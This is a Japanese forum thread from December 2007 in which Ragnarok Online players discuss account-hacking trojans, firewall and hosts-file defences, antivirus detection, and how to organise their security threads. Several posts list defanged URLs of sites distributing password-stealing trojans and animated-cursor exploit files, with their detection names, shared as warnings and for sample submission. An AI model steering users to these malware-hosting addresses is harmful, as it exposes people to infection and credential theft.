(○口○*)さん<>sage<>07/12/13 21:15 ID:9CNjocnK0<> >>930
>ラーゲが危ないということは知らず、前にも見たことのあるURL(色が変わっていた)だったため深く考えずにクリック。
>その数レス後でハックURLらしいということを知り相談に参りました。
んー、パっと見、サイズ0のiframeで自動的に読み込まれる危険なものも、自動で登録されるexeや
スクリプトも見当たらないんだけど。
アドレスだけ貼られるのを根拠もなくアカハック呼ばわりする奴もいる訳で、どうしたもんかと。
心配なら、OS再インストールコースいっとけ。 <>
(○口○*)さん<>sage<>07/12/13 21:31 ID:eUWv3gIQ0<> レスありがとうございます。
同じスレで
632 名前:(○口○*)さん[sage] 投稿日:07/12/12(水) 22:25 ID:DvOirwV80
>>629-630
ragnagateは何度もハックされてて
トロイし込まれてるので踏むべきではない
グーグルを介してチェックかけてみると
見事にトロイ反応でます
とあったのですが意味がわからず不安に思ったのです。
何か否定的なレスがどなたかからあれば再インスコに踏み切ろうかと思っていました。
自己責任でこのままいこうかなと思っています。 <>
(○口○*)さん<>sage<>07/12/13 22:40 ID:9CNjocnK0<> 確かに ragnagate をぐぐると、危険なファイルがインストールされる可能性について
ぐーぐる先生が警告してくれますね。
現時点で置かれているかどうかはともかく、危険視されている面があるということは
否定しません。踏んだタイミングと、確認したタイミングは違いますし、見落としがある
可能性も十分ありますから。
PG2や、複数のセキュリティソフトでのチェックなど、自己責任で使い続ける際に
併用すべき事項は忘れないようにね。 <>
(○口○*)さん<>sage<>07/12/13 22:46 ID:QcBtBRnF0<> SiteAdvisorでは安全って判定されているな
ただし、どの時点でのチェック結果なのかは調べられないな <>
(○口○*)さん<>sage<>07/12/14 02:53 ID:vgu1i3FC0<> >>890
私もここ最近調べ物中に、PG2のHTTP検出で何度も驚かされていますよ(ノA`)
全てwww■p5ip■comへの送信遮断。
きっちり遮断してくれるのは有り難い事ですけどね。 <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/14 04:31 ID:nGI0K+Ak0<> >>921 で挙げられた爆撃罠もリネージュ研究室でリスト入りを確認しました。
>>915
ありがとうございます。
海外版というか提供元ではオンラインであるのですね。
>>935
PG2でドメイン表示でHTTPブロックされたのは
あの時が初めてだったので…、いろいろといい勉強になりました。
でももしかしたら別の大きい質問情報サイトとかでも
別の危険ドメインが引っかかることもあるかも知れません。 <>
まとめ臨時 ◆kJfhJwdLoM<>sage<>07/12/14 04:41 ID:nGI0K+Ak0<> グーグルにURLが検索に引っかかるようになったのに
サイトのほうの通常版より先に、
ここで挙げたサンプルのまとめすぎリストの方が先にひっかかった…。 <>
(○口○*)さん<>sage<>07/12/14 13:18 ID:slQHuFwc0<> 「QuickTime 7.3.1」リリース、危険度の高い脆弱性を修正
ttp://internet.watch.impress.co.jp/cda/news/2007/12/14/17878.html
iTunesユーザー含めて、更新を激しく推奨。 <>
(○口○*)さん<>sage<>07/12/14 14:01 ID:QwnwQDs80<> リネージュ資料室さんの更新情報を見てチェックかけた結果。
1件だけカスペがすりぬけ&検出率悪いのがあったので検体提出してきました。
ttp://www■dyparagon■co■kr/gon/gmsex■exe
ttp://777■za123■cn/cc/999■exe
ttp://www■jplineage■com/smss■exe
ttp://www■pinkdoo■com/smss■exe
ttp://www■pinkdoo■com/mumy■exe
gmsex■exe : Trojan-PSW.Win32.OnLineGames.koe
999■exe : Trojan-Spy.Win32.Agent.pn
smss■exe : Trojan-PSW.Win32.OnLineGames.knv
mumy■exe : Trojan-PSW.Win32.OnLineGames.knv
999■exeはカスペがスルー
ttp://www■linkcetou■com/
ttp://www■gangnu■com/
ttp://www■gameyoou■com/
ttp://www■boadongo■org/vbshokmm/tmain■htm
ttp://www■boadongo■org/vbshokmm/f1main■htm
ttp://www■boadongo■org/vbshokmm/ffmain■htm
ttp://www■boadongo■org/vbshokmm/ffani■c
ttp://www■boadongo■org/vbshokmm/ttmain■htm
ttp://www■boadongo■org/vbshokmm/ttani■c
ttp://www■boadongo■org/vbshokmm/ttt■exe
ttp://www■boadongo■org/vbshokmm/fff■exe
ffani■c : Exploit.Win32.IMG-ANI.ac
ttani■c : Exploit.Win32.IMG-ANI.ac
ttt■exe : Trojan-PSW.Win32.Delf.ads
fff■exe : Trojan-PSW.Win32.OnLineGames.fcj <>
(○口○*)さん<>sage<>07/12/14 15:31 ID:rFCRLuOt0<> 初心者の質問ですまん
手動でhosts書き換えは、Firefoxを使っててもするべき? <>
(○口○*)さん<>sage<>07/12/14 15:38 ID:slQHuFwc0<> >941
するべき。 <>
(○口○*)さん<>sage<>07/12/14 15:51 ID:QwnwQDs80<> >941
ブラウザは関係無い。やっとけ。 <>
(○口○*)さん<>sage<>07/12/14 17:30 ID:2SxONn3p0<> なんかずれてね? <>
(○口○*)さん<>sage<>07/12/14 17:52 ID:QwnwQDs80<> おおぅ。確かに。適当に補完しといてくれw <>
(○口○*)さん<>sage<>07/12/15 08:59 ID:JfIsUftP0<> 一太郎、etc.
ttp://www.justsystems.com/jp/info/pd7005.html <>
(○口○*)さん<>sage<>07/12/15 17:02 ID:JfIsUftP0<> 姿を変えるウイルスの脅威! 対策ソフトの検出率で観測
ttp://pc.nikkeibp.co.jp/article/NPC/20071129/288352/
ここで検体いじってるような人には今更な感じもしますが
Packerで固められるとアウアウなアンチウイルスも多いということで。 <>
(○口○*)さん<>sage<>07/12/15 19:25 ID:g6oHA1ur0<> 最近aguseが使えなくなってるが一体どうしちゃったんだ・・・ <>
(○口○*)さん<>sage<>07/12/15 19:45 ID:cPtDzUva0<> aguse使えないですねorz
似たようなところのおすすめとかありませんでしょうか? <>
(○口○*)さん<>sage<>07/12/15 19:56 ID:RBnye8FG0<> aguse,netドメインを継続手続きしたのに失効状態になっているとか。
運営者の現を信用するとしたらするならば、何処のドメイン業者なんだ、
そんなタコなやつは…。
暫定的にaguse.jpで利用できるようです。 <>
(○口○*)さん<>sage<>07/12/15 19:58 ID:JfIsUftP0<> >>902 <>
(○口○*)さん<>sage<>07/12/15 20:13 ID:q3p7kj5T0<> わたしはここを使ってる。
対spamTools
http://antispam.stakasaki.net/tools/spamclaim-tools.html
IPひろば
http://www.iphiroba.jp/ip.php <>
(○口○*)さん<>sage<>07/12/16 03:41 ID:yZy8sEdm0<> 質問なのですが、現在主流となっているアカウントハックウィルスというものは
感染後どういった経路を経て IDなりPASSなりを盗むのでしょうか?
感染したPCでROにログインしなければ安全 という文も見たのですがこれは事実なのでしょうか
またID・PASSなどを手動で打ち込まない(コピペなどを使ったり、IDに関しては感染前にキープしていたものを変えずにログインする)
などの手段は有効なのか どなたか詳しい方がおりましたらよろしくお願いします。 <>
(○口○*)さん<>sage<>07/12/16 04:25 ID:NhsRlWmh0<> >>952
殆どは、Winsock乗っ取り。つまり、ログイン鯖への送信内容を横取りしている。
中には、キーロガー併用のものもある、とは聞いたが。
少なくとも、送信パケットを読まれている段階で、コピペやID保存など、小手先の手段では無理。
だからこそ、PG2などのFWを利用して、不審なアドレスへのデータ送信を水際で防ぐ事が重要視されている。 <>
(○口○*)さん<>sage<>07/12/16 10:12 ID:Qo5lpEha0<> あるゲームのセキュリティにおいてコピペが推奨されるなら
ついでにクリップボードも盗ればいい。
ちなみに画面をキャプるのもある(ATMの暗証番号みたいに
マウスでクリックするタイプの鍵に有効)。 <>
(○口○*)さん<>sage<>07/12/16 14:33 ID:SvOecpCW0<> 垢ハックに対して現実的にはキャラパスが無意味である、という部分からお察しください。
メモリ参照したり、パケットを傍受したり、SS(スクリーンキャプチャ)撮ったりするので
感染(発動)した時点で、小手先の技は無意味。
更にゾンビPC化するタイプならHDDの中身は全部見られるからPASS等を保存してたら
それも盗まれると思ったほうがいい。
感染したトロイが、こういう動作をするタイプだから、こう言う動作はしない、とか
誰にも断言出来ない。
>953
>不審なアドレスへのデータ送信を水際で防ぐ事が重要視
その書き方だと、感染後の対策に見えてしまうが、本来は感染しない事の方が重要。
PG2とかが水際で防げるのは、どちらかと言えば副次的な効果。
一番重要なのは不審なアドレスへアクセスしない・させない事で、そのためにPG2や
hostsの書き換えで自衛する。
1番重要なのは、不審なアドレスへのアクセスを防いで感染しない事。(感染前)
次いで重要なのは、感染した時にそれを検出し、当人が気付ける事。(感染後)
その次に重要なのは、不審な送信先にデータが送られるのを防ぐ事。(感染後)
感染しなければ、データ送信を水際で防ぐ必要は無い。 <>
(○口○*)さん<>sage<>07/12/16 16:36 ID:yZy8sEdm0<> みなさん質問にお答え頂きありがとうございます。
分かりやすくとても参考になりました。 <>
(○口○*)さん<>sage<>07/12/17 06:00 ID:56NqmQMO0<> safespace
ttp://www.oshiete-kun.net/archives/2007/12/safespace.html
仮想BOX内でブラウザを動かす。よさげ。いろいろinstallするけど
ttp://www.artificialdynamics.com/content/products/register-personal.aspx <>
(○口○*)さん<>sage<>07/12/17 09:47 ID:mv4GNvCz0<> >>957
それ、どこまで仮想化してるのか不明でちょっと使う気になれないな。
バッファオーバーフローやブラクラでも、余所に影響を与えないように切れるというだけなんじゃ?
どういう仕組みで仮想化して、どこまで影響ブロックするのかわからないから、信用できるか判断保留。
総合スレ157
>>検体入手に困るので、ちゃんとファイル名まで載せてもらえるとありがたい。
>悪いが俺もそこまで暇じゃない、作業の合間の片手間に書いたりやったりしてるだけだ。
>そういわれるのは正直心外、つまりその引用部分は余計だ。
いつも情報提供ありがとうございます。情報があるだけでもありがたいです。
でも、自分ではファイル同じと言ってる訳でアドレスはコピペできる範囲の情報だと
思うのですがいかがでしょう。
あの書き方だと、わたしのように、ほにゃらら/index.htmが問題なのかと誤認しますよ。
次回可能であれば、ファイル名まで掲載して欲しいです。無理なら、可能な範囲の情報でも
有難く拝見させて頂きます。
>スレ利用者ALL
テンプレに追記更新したい内容はないだろうか。
1.相談受付範囲について、あっちいけこっちいけが頻繁なので>>556のような提案が出ている。
一般相談以外の、アカハック踏んだ事例もここで扱い(総合スレでも扱う)、こちらに出た内容は
必要なものだけ、あとからまとめ用に、総合スレに転記する形でどうだろうか。
2.>>918-920でセキュWikiをテンプレに載せるかどうかという意見が出ており決着付いてない。
このまま進展がなければ、そのまま掲載で。 <>
(○口○*)さん<>sage<>07/12/17 10:29 ID:mv4GNvCz0<> RO系の管理放棄されたBBSを見たら、11月頭が最後の投稿になっていて
業者からも見放されたかと…取り敢えず、確認してみました。
多分、全部既出アドレス(中身はともかく)なので、リストアップは
されていると思います。
【IP失効?】
http://www■8568985■com/garegky/egk■htm
http://www■8568985■com/garegky/egk■cur
http://www■8568985■com/mmgjkin/jpmm■exe
http://www■8568985■com/mmgjkin/
http://www■8568985■com/garegky/
【125■65■112■95グループ】接続できず
http://www■extd-web■com/wiki/
http://www■lian-game■com/wiki/
http://www■blog-ekndesign■com/wiki/
http://www■blog-ekndesign■com/wiki/see■exe
【61■129■51■203】接続できず
http://www■blog-plaync■com/game/ragnarokonline/
【202■224■203■91】接続できず
http://www■omakase-net■com/bbs/picte■asp
【125■65■112■49グループ】index■htmはあるけど、その先の3■exeの入手失敗
http://www■rentalbbs-livedoor■com/roblog/
http://www■chaosx0■com/roblog/
http://www■ragnarokgvg■com/roblog/
http://www■samples112xrea■com/roblog/
http://www■raginfoy■com/roblog/3■exe <>
(○口○*)さん<>sage<>07/12/17 10:29 ID:sAW4x8yI0<> >958
同意。
その記事見たが、どこまで信用しきれるか怪しいので載せなかった。
VMWareとか用意してその上で動かすとか、何らかの検証しないとちょっと怖いので
自分も判断保留。
テンプレ系の話だが
1→ハクスレは報告用にして、全部の相談はこちらでやってしまったらどうだろうか
向こうは基本的に情報収集・報告用にした方がすっきりする。
2→セキュWikiは「スレッドテンプレサイト」として掲載していいと思う。
情報Wikiとしての利用には向かないが、細かい利用はあるし。
追記:まとめ臨時サイトも載せた方がいいと思われ。 <>
(○口○*)さん<>sage<>07/12/17 10:30 ID:mv4GNvCz0<> これは検出率悪かったので検体提出行ってきます。
【61■139■126■43】まだ生存。特にrbt1■exeは検出率悪い
http://gtvxi■com/vistamixi/
http://www■mbspro6uic■com/mbsplink/
http://www■mbspro6uic■com/indexm■htm
http://www■mbspro6uic■com/indexff■htm
http://www■mbspro6uic■com/naizi/nai■htm
http://www■mbspro6uic■com/naizi/ani■c
http://www■mbspro6uic■com/naizi/nait■htm
http://www■mbspro6uic■com/naizi/tani■c
http://www■mbspro6uic■com/naizi/ff22■exe
http://www■mbspro6uic■com/naizi/rbt1■exe
ff22■exe:Trojan-PSW.Win32.OnLineGames.fcj
rbt1■exe:Trojan-PSW.Win32.OnLineGames.lbb <>
(○口○*)さん<>sage<>07/12/17 10:48 ID:agKaDBZI0<> >>958,960
3.RO板への移転について
もどうよ?
こっちでいいじゃんという人はLiveROで続けるメリットを書く感じで <>
(○口○*)さん<>sage<>07/12/17 10:56 ID:mv4GNvCz0<> >>962
LiveROは一過性で消えても構わない内容。相談と回答なんて同じことの繰り返しなので
ログが残るRO板に移動する必要性ないんじゃないかな。RO板だと、スレ立てが管理人さん任せで
手間かける内容が増える訳だしね。
総合スレの、アカハック実例が報告された際の、検体確認と、カスペで検出可能かの報告も
残す必要がないっちゃないけど。 <>
(○口○*)さん<>sage<>07/12/17 11:05 ID:agKaDBZI0<> 向こうのスレだったけど、中には警察へ行った時の対応話とかあったじゃん
ああいうのが警察行き躊躇ってる人の背中を押すと思うし、残さない理由がないでしょ
スレ立ての手間については遠慮しすぎだと思うわ <>
(○口○*)さん<>sage<>07/12/17 12:29 ID:BKLWd/ru0<> Wikiに関して、テンプレ入りという事は一見さんも見る事になる。ところが
管理人不在なのでアカウントハッカーの改竄をうける危険性が高い
(というかされた)。ウイルスに対する情報を求めに来たのにもかかわらず、
テンプレに有るサイトで踏ませちゃ本末転倒だ、と思う。中国IP拒絶しても
最近はODNを代表とした日本ISPからの書込も多いのだから本格的な対策
には成りえない。よって現状では載せる事に反対。テンプレに載せるならば
誰かに管理人になって貰うか、せめて編集認証を入れるようにしてもらわ
なければいけないと思う。
セキュスレRO板移転は賛成。同じく遠慮の必要は無いと思う。
ただその場合、相談所(何でも駆け込み寺)と情報集積所(分析)みたいに
すっぱりと分けちゃうのが望ましいかと。スレタイも工夫が必要だね。 <>
(○口○*)さん<>sage<>07/12/17 14:00 ID:H1Xnh7Mb0<> >>961
既出のUpack圧縮FFXIトロイに無圧縮Lineageトロイ、
こんなの見逃すのがあるのか…。 <>
(○口○*)さん<>sage<>07/12/17 14:21 ID:mv4GNvCz0<> >>966
こんな結果だ。多分、最近、差し替えられたばかりのものを偶然拾ったんだろう。
ttp://www.virustotal.com/resultado.html?6ef686897e768b68b72a7c2dc6dfa416
リネージュ資料室の自動監視結果だと 2007/12/16 18:24:38 の差し替え検知してるし。
>>965
取り敢えず、今回はテンプレ入り。次回は相談って形にしないか?
危険視するあまり、有益な情報を埋もれさせちまう弊害の方が嫌だな。(なぁに、かえって免疫がつく)
相談所と分析所も分離するのはいいと思うけど、相談結果を分析したコメントを示して
○○であれば検知可能なので、それで確認してみてくれという説明するのには
同じスレの方が便利な面もあり全面的に賛成するのもどうかなとか。
わたしはこんな使い分けの方がいいんじゃないかと思う。
分析は結構流れるので、総合スレでやっちゃうと、まとめ情報が探しにくい気がする。
相談:基本セキュスレ
アカハックに関してはタイトルから入ってしまう可能性もあるので、総合スレでも誘導せずに回答
分析:どっちでやってもいいけど、まとめは総合スレに。
もしくは、セキュスレで全部やって、リストまとめとかの情報のみを総合スレでもいいかな程度。 <>
(○口○*)さん<>sage<>07/12/17 14:29 ID:H1Xnh7Mb0<> >>967
rbt1(Lineage用)をドロッパ切り離してAntiVirに投げたけど
検知しなかった。こんなの余裕で引っ掛けると思ったんだが…
(Rising=ウイルスキラーすら引っ掛けてる)。
あとその結果、スマンテッコが居ないな。 <>
(○口○*)さん<>sage<>07/12/17 14:40 ID:a40ptcSY0<> RO板移転をする気があるなら早めにこっちで決定しないと間に合わないんじゃないか?
こっちで出た結果を元にRO板の是非を問うスレでさらに検討されるんだろうから本気で考えてるなら次スレには間に合わなくなるし
次スレが立ったら向こうに立てるのはさらに次スレになるぞ? <>
(○口○*)さん<><>07/12/17 14:41 ID:zfDnUsfR0<> 統合してこのスレは廃止でおk <>
(○口○*)さん<>sage<>07/12/17 15:22 ID:56lo/cQ20<> だが断る
自由に建てられるから永遠に建ててやるよ <>
(○口○*)さん<>sage<>07/12/17 15:26 ID:2JZerRcZ0<> 統合すると危険アドレスの情報が埋もれやすいので分離の方がいい。
ぶっちゃけ、使われ方は今のままでいいと思う。
ただ相談はセキュスレがメインの方が見通しがいいと思われる。
統合スレは被害報告とチェック結果が多いし危険アドレスもチェックしやすい。
相談はどっちでやっても大差ないが、あっち行け、こっち行け、で右往左往
させるなら、ややこしさからも見通し面からもセキュスレでやった方が
いいだろう。
板を移転させる理由はよく判らん。
LiveRoでも特に困らないし、RO板はRO関係の話が主体で、セキュスレでやるのは
Win全般とかそれ以外とか。
板違いになるだけだろう。 <>
(○口○*)さん<>sage<>07/12/17 15:26 ID:2JZerRcZ0<> 統合すると危険アドレスの情報が埋もれやすいので分離の方がいい。
ぶっちゃけ、使われ方は今のままでいいと思う。
ただ相談はセキュスレがメインの方が見通しがいいと思われる。
統合スレは被害報告とチェック結果が多いし危険アドレスもチェックしやすい。
相談はどっちでやっても大差ないが、あっち行け、こっち行け、で右往左往
させるなら、ややこしさからも見通し面からもセキュスレでやった方が
いいだろう。
板を移転させる理由はよく判らん。
LiveRoでも特に困らないし、RO板はRO関係の話が主体で、セキュスレでやるのは
Win全般とかそれ以外とか。
板違いになるだけだろう。 <>
(○口○*)さん<>sage<>07/12/17 15:28 ID:2JZerRcZ0<> 統合すると危険アドレスの情報が埋もれやすいので分離の方がいい。
ぶっちゃけ、使われ方は今のままでいいと思う。
ただ相談はセキュスレがメインの方が見通しがいいと思われる。
統合スレは被害報告とチェック結果が多いし危険アドレスもチェックしやすい。
相談はどっちでやっても大差ないが、あっち行け、こっち行け、で右往左往
させるなら、ややこしさからも見通し面からもセキュスレでやった方が
いいだろう。
板を移転させる理由はよく判らん。
LiveRoでも特に困らないし、RO板はRO関係の話が主体で、セキュスレでやるのは
Win全般とかそれ以外とか。
板違いになるだけだろう。 <>
(○口○*)さん<>sage<>07/12/17 15:29 ID:2JZerRcZ0<> ぐあ、なんで連投orz
すまぬ。。。 <>
(○口○*)さん<>sage<>07/12/17 17:04 ID:48H+Csck0<> 埋もれやすいっていう意味がわからんな。
ROみたいにログが消えるわけでもないのに。
ぶっちゃけ向こうのスレで「雑談スレ行け」レスが連呼される方がよっぽど無駄だ。 <>
(○口○*)さん<>sage<>07/12/17 17:13 ID:UFHsBaBP0<> 纏めてくれる人が纏め難くなるのを考慮かな?
にゅ缶側に行くかどうかはどっちでもいいっていうのが素直な所だが、
にゅ缶の方がパッと見に来た人には目に付くかも?
分離に関しては今の状態で落ち着いて来てるんだから分離したままでいいんじゃないの?
なんだったら今の総合スレを雑談おkにして、新たに危険ドメイン専用スレ作った方がいいかな? <>
(○口○*)さん<>sage<>07/12/17 17:45 ID:a40ptcSY0<> 話のお題としては
・このスレをRO板へ移転するかどうか(その際のスレの使い分けについては>>556だろうか?)
・総合スレと統合するかどうか
この2つかな?
個人的には板移動+使い分けの変更について賛成で、統合はしない方がいいと思う
>964が言っている様に相談事を此方で全部やって、ログが残る事で後の人にもわかりやすいと思うし、
相談事がこっちだけになれば総合スレでも雑談や相談が少なくなって、情報のまとめやすさについても改善されるのではないかと思う
スレ立ての手間なんて、今の現状を考えたらこのスレが増えても誤差みたいなものだろうし、
必要性があると言う意見が多数ならばむしろ積極的に立てるべきだと思う
このスレが立ってから約4ヶ月なので、このペースなら管理人の負担も殆ど無いと思うしね <>
(○口○*)さん<>sage<>07/12/17 18:16 ID:IA1Ow4zD0<> ノートン先生でTracking Cookieが検出されて排除しましたが、
これで垢ハックされた可能性はありますでしょうか?
エロサイト見たあとによく検出されます <>
(○口○*)さん<>sage<>07/12/17 18:19 ID:mv4GNvCz0<> >>979
それは別物だボケ!! 「Tracking Cookie」でぐぐれ。
http://eazyfox.homelinux.org/Security/Beginner/beginner08.html
http://blog.lucanian.net/archives/50835714.html <>
(○口○*)さん<>sage<>07/12/17 18:29 ID:NWdsk+nC0<> Tracking Cookieの質問はテンプレレベルで良く出るな <>
(○口○*)さん<>sage<>07/12/17 19:22 ID:jeD3yzF60<> ・ROセキュリティ情報収集スレ
・セキュリティ対策相談・雑談スレ
のふたつを、RO板に立てるというのでよかないですか?
「総合」という名前があると混乱の元だと思います。
板トップからは「相談・雑談」に飛ばしてもらう方向で。
相談・雑談については、むしろPUBでいいじゃないって気もしますが。
LiveROで別個に何か立てる必要とかはないと思うけど、
立てたい人がいるなら立てたらいいのです。使われなければ流れるだけ。 <>
(○口○*)さん<>sage<>07/12/17 19:48 ID:mv4GNvCz0<> 980踏んだんで立てるの試してくる。今までの内容ちょっと整理してみるよ。
相談テンプレとかで使いにくいとこあったら今のうちに指摘をお願い。
・Wikiは現時点では載せておく(暫定)
・相談は、セキュスレで全て扱う
総合スレに投下された場合、アカハックなら誘導せずに総合スレでも回答OK
総合スレに一般話題の相談が出た場合は、セキュスレに誘導
過剰な誘導は避ける方向で
・RO板への移動に関しては、次スレで検討 <>
(○口○*)さん<>sage<>07/12/17 19:59 ID:7ea34EJ90<> しかしなんだって埋まるギリギリに提案出してくるんだかw <>
(○口○*)さん<>sage<>07/12/17 20:18 ID:mv4GNvCz0<> セキュリティ対策、質問・雑談スレ4
http://enif.mmobbs.com/test/read.cgi/livero/1197889519/
テンプレ1の文面修正。
リンク修正。・・・あ゛・・・BSテンプレのアドレス間違ってる
ESSへのリンク、無償のセキュリティソフトへのリンク追加(その結果改行多すぎでテンプレ1つ増えた)
(VirusTotal当たりも入れといた方が良かったかな?) <>
(○口○*)さん<>sage<>07/12/17 20:22 ID:RdtDo7M/0<> >>985
乙
次スレで早めにRO板への移動について結論を出しておいた方がよさそうだね <>
(○口○*)さん<>sage<>07/12/17 20:23 ID:EUrypVmr0<> >>984
勝手にテンプレ変えて立てたいから <>
(○口○*)さん<>sage<>07/12/17 20:28 ID:mv4GNvCz0<> >>987
スレ中で少なくとも3回は話ふったんだけどな。反応があったのが直近だけだったという悲しい事実。 <>
(○口○*)さん<>sage<>07/12/17 20:35 ID:sAW4x8yI0<> >985
乙
>987
過去にハクスレとセキュスレの両方のテンプレについて、変更した方がいいんじないか?と
話題を振ったんだが、割とスルーされたんだよな。
セキュWikiの一部変更等もしたが、続いて練る人も殆ど居ず、様子見してたら結局そのままとか。
煽る暇あったら、テンプレ練る手伝いしてくれって。 <>
(○口○*)さん<>sage<>07/12/17 20:38 ID:x+lG0yoQ0<> 以前から統合や現状維持でいいというレスもあるんだけど?
自分に都合のいいレスしか見えない人はRO板に隔離されててくださいw <>
(○口○*)さん<>sage<>07/12/17 20:51 ID:RdtDo7M/0<> >>990
LiveROとRO板の関係を考えると、こっちの方が隔離場所なんだけどな <>
(○口○*)さん<>sage<>07/12/17 21:15 ID:sAW4x8yI0<> >990
2つのスレ板の使い方については、俺は>974で書いたように基本現状維持でいいと思ってるが
テンプレだけは整理した方が利便性がいいだろう、という考え。
スレ立てしたら判るが、今のテンプレは長いし張るのが結構手間なんだよ。
ハクスレの新スレ依頼時に連続投稿制限に引っかかって手間取ったし、セキュスレも同様。
利便性が悪いんだよ。
見やすく整理した方が何かと利便性がいいと思うんだがね。 <>
(○口○*)さん<>sage<>07/12/17 21:18 ID:sAW4x8yI0<> 間違えた。
>974じゃなくて自分の意見は>960だった。 <>
(○口○*)さん<>sage<>07/12/17 22:44 ID:bCR9iAqk0<> テンプレの整理には、セキュWikiへの掲載と、Wiki自体の維持管理もセットで考える必要があるね。
そうなると、Wiki管理者を早々に配置した方が良いということにはなるけど。
一応言い出しっぺではあるけど、管理者は多分務まらない。余録がないので、無責任な立候補は控えるよ。
幸いにして、rowki.jp配下に収容されていることにより、OSやハードウェアのシステマティックな部分はサーバ管理者に任せられるし。
雑談スレは、当面はLiveROで良いのではないかな。
今でこそ、★持ちの補充でアクティビティは向上したと言えるけど、追加されたのはあくまで1名。
リアル情勢の変化などで、スレ建ての迅速性が再度失われた際に、駆け込み寺的なスレが存在しないリスクの方が痛いかと。 <>
(○口○*)さん<>sage<>07/12/18 10:17 ID:al8DKd9o0<> >994
>幸いにして、rowki.jp配下に収容されていることにより、OSやハードウェアのシステマティックな部分はサーバ管理者に任せられるし。
単に弓手Wikiの人がスペースを貸してくれただけの話で、rowki.jpとは直接は関係ないよ。
BS WikiやクエストWiki、アコプリWikiはrowki.jpだけど、IP引けば判るように実態は別。
OSやHW面の話をするなら、レン鯖で運営するのと一緒。
ついでに梅がてらに個人的意見
-スレテンプレの件
--本スレ・セキュスレ共にスレッドテンプレは4レス分以内に纏めたほうが、建てやすいし見やすい。
-スレの件
--RO板に移動する件は、以前スレ建て相談スレで「話題が広すぎてRO板では板違い」と指摘されてた
--LiveROから移転するならPUB板の方がまだ向いてる気もする
--「ハクアドレス情報収集分析スレ」と「セキュリティ対策雑談スレ」にした方がよさそう
-Wikiの件
--Wiki管理はどういう方向性で運用するのか。元々は単にテンプレ相談用
--もし恒久的に使うなら、職Wikiクラスのセキュリティ設定でいいのか、クエストWikiのように
編集ページを分離する等、別種の設定が必要になったり、と設定の難易度が変わる
-Wiki管理人の件
--恒久的運用なら管理人は必要になるが、運用の方向性次第では不要になる <>
(○口○*)さん<>sage<>07/12/18 16:46 ID:GRuOXCgV0<> >>995
ちょっと書き方が足りなかった。
rowiki.jpというよりは、eldgasyk.jpと言うべきだった。基本的にCNAMEで前者から引かれる構造なので。
それと、世間一般のレン鯖よりは、ネットゲーム関連のexploit対策に特化している部分も評価対象と考えるべきか。
RO板への移動は、流石に板違いとされる意見もある。
かといって、PUB板は過疎も良いところで、MMOBBSが実質RO特化掲示板である事を象徴している状態。
結局、LiveROでの進行が無難となってしまう。
過去ログ保存の必要性を説く話もあるけど、脆弱性情報の類いは、足が早く賞味期限の短いものも多いので、微妙。
とりたてて重要な、危険アドレスの類いは、垢ハックスレに集約される形式になっているし。 <>
(○口○*)さん<>sage<>07/12/18 17:34 ID:avrrIh2C0<> 埋め <>
(○口○*)さん<>sage<>07/12/18 19:04 ID:A5UuKoesO<> スレ終盤に質問失礼します。
今日(12/18)のパッチをあててからROを起動したら、カスペがプロアクティブディフェンスを発動しました。
オブジェクト:Ragえぐぜ.えぐぜ
驚異の種類:キーロガー
ってなってたんですが、ウチだけ?
ちなみにカスペのバージョンは7.0で、プロアクティブディフェンスの設定で、キーロガーを:警告にしてあります。
パケット暗号化云々が関係してそうだけど、何か不安なので一応スキャン中です。
PC書き込みができないと思って携帯で書いたが、エグゼがいけなかったのか…?と途中で気付いて俺涙目orz <>
(○口○*)さん<>sage<>07/12/18 19:31 ID:avrrIh2C0<> nProtectの挙動はrootkitと変わらんから怒られる。
いつものことだ、許可してやれ。 <>
(○口○*)さん<>sage<>07/12/18 19:45 ID:Hxc3Pa1z0<> http://enif.mmobbs.com/test/read.cgi/livero/1197889519/ <>
1001<><>Over 1000 Thread<> このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。 <>